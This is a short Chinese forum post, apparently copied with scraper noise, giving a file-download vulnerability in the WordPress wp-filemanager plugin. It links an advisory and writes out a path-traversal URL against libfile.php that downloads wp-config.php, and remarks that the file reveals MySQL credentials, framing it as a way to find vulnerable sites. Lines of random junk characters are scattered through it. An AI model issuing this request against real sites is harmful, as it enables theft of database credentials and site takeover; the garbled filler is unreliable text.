洞详解:http://packetstormsecurity.com/f ... -File-Download.html8 `$ h+ r5 V$ _1 }' B8 `% J5 \6 w
( O( k* w6 F9 U1 J* D7 `6 n" @- Q! q: Y
查找漏洞网站:访问/wp-content/plugins/wp-filemanager/incl/libfile.php?&path=../../&filename=wp-config.php&action=download,下载wp-config,其中回显MySQL。
3 Q" P i' W7 {: B- m. C# }! e5 ^ |